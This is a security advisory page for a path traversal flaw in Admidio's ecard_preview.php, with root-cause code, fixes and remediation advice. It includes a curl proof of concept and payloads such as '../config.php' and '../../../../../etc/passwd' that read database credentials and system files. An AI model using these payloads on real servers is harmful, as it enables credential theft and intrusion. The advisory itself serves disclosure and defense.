Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
4DescriptionGitHub Advisory
Summary
The ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate(). An authenticated user can supply a path traversal payload (e.g., ../config.php) to read arbitrary files accessible to the web server process, including adm_my_files/config.php which contains database credentials.
Details
Root Cause: The ecard_template parameter is a select box whose value is only sanitized via strStripTags() during form validation, which does not restrict path traversal characters. Unlike ecard_send.php which explicitly validates the template name as a safe filename, ecard_preview.php omits this check entirely.
Code Path:
modules/photos/ecards.php:143-152- The form creates a select box with template filenames fromadm_my_files/ecard_templates/. The form object is stored in the session.modules/photos/ecard_preview.php:33-34- The POST request is validated against the stored form object:
$categoryEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);
$formValues = $categoryEditForm->validate($_POST);src/UI/Presenter/FormPresenter.php:2190-2243- Thevalidate()method appliesStringUtils::strStripTags()to all values and performs type-specific checks forcaptcha,date,editor,email,number,url, anduuid- but has no validation case for select box values. The attacker-controlled value../config.phppasses through unchanged.modules/photos/ecard_preview.php:48- The unvalidated value is passed directly togetEcardTemplate():
$ecardDataToParse = $funcClass->getEcardTemplate($formValues['ecard_template']);src/Photos/ValueObject/ECard.php:67-77- The filename is concatenated into the path and opened:
public function getEcardTemplate(string $tplFilename, string $tplFolder = ''): ?string
{
if ($tplFolder === '') {
$tplFolder = ADMIDIO_PATH . FOLDER_DATA . '/ecard_templates/';
}
// ...
$fileHandle = @fopen($tplFolder . $tplFilename, 'rb');With $tplFilename = '../config.php', this resolves to ADMIDIO_PATH/adm_my_files/ecard_templates/../config.php → ADMIDIO_PATH/adm_my_files/config.php.
Why ecard_send.php is NOT vulnerable: At line 35, it independently validates the template name:
$postTemplateName = admFuncVariableIsValid($_POST, 'ecard_template', 'file', array('requireValue' => true));This calls strIsValidFileName() which checks basename($filename) !== $filename, blocking any path traversal. The preview endpoint lacks this check.
PoC
# Step 1: Log in and visit the ecard form to create a session with a form object
# Navigate to: /modules/photos/ecards.php?photo_uuid=<valid_album_uuid>&photo_nr=1
# Extract the adm_csrf_token from the rendered form HTML
# Step 2: Send path traversal payload to read config.php (contains DB credentials)
curl -b 'PHPSESSID=<session_cookie>' \
-X POST 'https://target/modules/photos/ecard_preview.php' \
-d 'adm_csrf_token=<csrf_token>&ecard_template=../config.php&ecard_message=test&photo_uuid=<valid_uuid>&photo_nr=1&submit_action=preview'
# The response body will contain the contents of adm_my_files/config.php
# rendered inside the ecard preview HTML, including:
# $g_adm_srv (database host)
# $g_adm_db (database name)
# $g_adm_usr (database username)
# $g_adm_pw (database password)
# To traverse further outside adm_my_files:
# ecard_template=../../system/bootstrap/constants.php (reads PHP source)
# ecard_template=../../../../../etc/passwd (reads system files)Impact
- Database credential disclosure: Any authenticated user can read
adm_my_files/config.php, exposing database host, name, username, and password. If the database is network-accessible, this enables full database compromise. - Source code disclosure: Arbitrary PHP files can be read, revealing application logic, internal paths, and potentially other secrets.
- System file disclosure: With sufficient traversal depth (
../../../../../etc/passwd), system files can be read, aiding further attacks. - Low barrier to exploit: Only requires a regular member account - no admin privileges needed.
Recommended Fix
Add filename validation to ecard_preview.php before passing the template name to getEcardTemplate(), matching the validation already present in ecard_send.php:
// In modules/photos/ecard_preview.php, add BEFORE line 48:
$postTemplateName = admFuncVariableIsValid(
$formValues, 'ecard_template', 'file', array('requireValue' => true)
);
$ecardDataToParse = $funcClass->getEcardTemplate($postTemplateName);Alternatively, add select box value validation to FormPresenter::validate() to verify that submitted select box values match one of the predefined options, which would protect all select boxes across the application:
// In src/UI/Presenter/FormPresenter.php, inside the switch statement in validate():
case 'select':
if (isset($element['values']) && !array_key_exists($fieldValues[$element['id']], $element['values'])) {
throw new Exception('SYS_FIELD_INVALID_INPUT', array($element['label']));
}
break;AnalysisAI
Path traversal in Admidio ecard_preview.php allows authenticated users to read arbitrary server files including database credentials by bypassing filename validation on the ecard_template POST parameter. An authenticated attacker can supply path traversal payloads such as ../config.php to read adm_my_files/config.php containing unencrypted database host, username, and password, or traverse further to access system files. Exploitation requires only a regular member account with no special privileges, making this a high-impact vulnerability accessible to any registered user.
Technical ContextAI
Admidio's ecard preview functionality processes electronic greeting card templates through the ecard_preview.php endpoint. The vulnerability stems from incomplete input validation in the form processing pipeline. When the ecard form is submitted, the ecard_template parameter passes through FormPresenter::validate() which applies only strStripTags() sanitization to select box values-a function designed to remove HTML tags but not to restrict path traversal characters like ../ and /. This contrasts with ecard_send.php which explicitly calls admFuncVariableIsValid() with 'file' type validation that invokes strIsValidFileName() to reject any path containing directory traversal sequences. The unvalidated filename is then concatenated directly into a file path in ECard::getEcardTemplate() and passed to PHP's fopen() function, allowing the ../ sequences to escape the intended ecard_templates directory and access parent directories including the sensitive config.php file. CWE-22 (Path Traversal) is the root cause-insufficient canonicalization or restriction of paths containing special elements.
RemediationAI
Update Admidio to version 5.0.9 or later immediately-this is the vendor-released patch that adds filename validation to ecard_preview.php matching the existing validation in ecard_send.php. The patch implements the recommended fix by calling admFuncVariableIsValid() with 'file' type validation on the ecard_template parameter before passing it to getEcardTemplate(), blocking any path traversal sequences. If immediate patching is not feasible, implement compensating controls: (1) Use web server configuration (Apache mod_rewrite or nginx rewrite rules) to block POST requests to ecard_preview.php containing ../ in the request body, though this is fragile; (2) Restrict database user permissions to only the minimum required tables, limiting the impact if config.php is leaked and credentials are compromised; (3) Implement strict file permissions so adm_my_files/config.php is not world-readable and rotate database credentials immediately; (4) Consider disabling the ecard feature entirely via Admidio's module management if ecards are not essential to your deployment. The most effective interim measure is credential rotation plus strict file permission hardening, as the vulnerability cannot be fully mitigated without the code patch. Reference vendor advisory for patch instructions: https://github.com/Admidio/admidio/security/advisories/GHSA-m3vp-3jjm-gpmx
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-28263
GHSA-m3vp-3jjm-gpmx